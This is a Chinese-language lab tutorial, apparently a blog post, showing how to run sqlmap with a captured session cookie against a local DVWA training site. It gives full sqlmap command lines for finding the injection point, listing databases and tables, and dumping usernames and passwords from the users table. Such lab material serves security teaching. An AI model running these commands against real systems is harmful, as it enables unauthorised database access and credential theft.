SQLMAP进阶使用 --cookie

实验原理

Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在 Web应用中至关重要,用户的唯一标识session id也是存在cookie 中的。利用SQLMAP对目标网站进行检测时,默认是不带cookie 的,在一些情况下发出去的请求可能会被服务器拒之门外。这时,我们需要带上 cookie才能进行SQL注入检测。

1.访问DVWA网站

1)访问dvwa,并登录。admin password

SQLMAP进阶使用 --cookie_第1张图片

2) 登录后,在左侧菜单点击“DVWA Security”,将DVWA网站的安全级别设为“Low”,并点击Submt

SQLMAP进阶使用 --cookie_第2张图片

3)左侧菜单点击“SQL Injection”模块,进入SQL注入训练模块

SQLMAP进阶使用 --cookie_第3张图片

2.利用Burpsuite工具抓包

1)启动Burpsuite并设置代理服务端口

https://img-blog.csdnimg.cn/f547110f81494cb19cc6741ed79f2131.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWl9sMTIz,size_20,color_FFFFFF,t_70,g_se,x_16

2)设置Firefox代理

SQLMAP进阶使用 --cookie_第4张图片 ​ 

 注意:端口要一致

3)开启 Burpsuite的代理拦截功能
https://img-blog.csdnimg.cn/86e4e8ba6f724c3ab32757cb9845ffbe.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWl9sMTIz,size_20,color_FFFFFF,t_70,g_se,x_16

 4)利用Burpsuite工具拦截HTTP请求包

进入DVWA网站SQL注入训练模块,输入1,点击Submit,此时Burpsuite会拦截到HTTP请求包

SQLMAP进阶使用 --cookie_第5张图片

 将其中的cookie值拷贝下来,作为下一步为SQLMAP的 --cookie参数赋值

3.启动SQLMAP

进入sqlmap目录,在搜索框输入cmd,并回车

https://img-blog.csdnimg.cn/ca82c496933e43629ad82f5169db5c08.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWl9sMTIz,size_20,color_FFFFFF,t_70,g_se,x_16

 4.寻找注入点

 python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" 

SQLMAP进阶使用 --cookie_第6张图片

 检测结果

 5.获取数据库的库名

1)获取所有数据库的库名

 python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" --dbs

SQLMAP进阶使用 --cookie_第7张图片 

 2)获取当前数据库的库名

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" --current-db

SQLMAP进阶使用 --cookie_第8张图片 

6.获取dvwa数据库中所有的表名

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa --tables 

SQLMAP进阶使用 --cookie_第9张图片 

其中,有一个名为users的表,这当中可能存放着网站用户的基本信息。

7.获取users表的全部字段名

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa -T users --columns 

SQLMAP进阶使用 --cookie_第10张图片 

8.获取users表中user和password字段的全部值

python sqlmap.py -u "http://192.168.5.116/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=6j0t9i83en1rt8v8j9j2t3d6t4" -D dvwa -T users -C user,password --dump 

 SQLMAP进阶使用 --cookie_第11张图片

你可能感兴趣的:(SQL注入,web安全,SQL注入)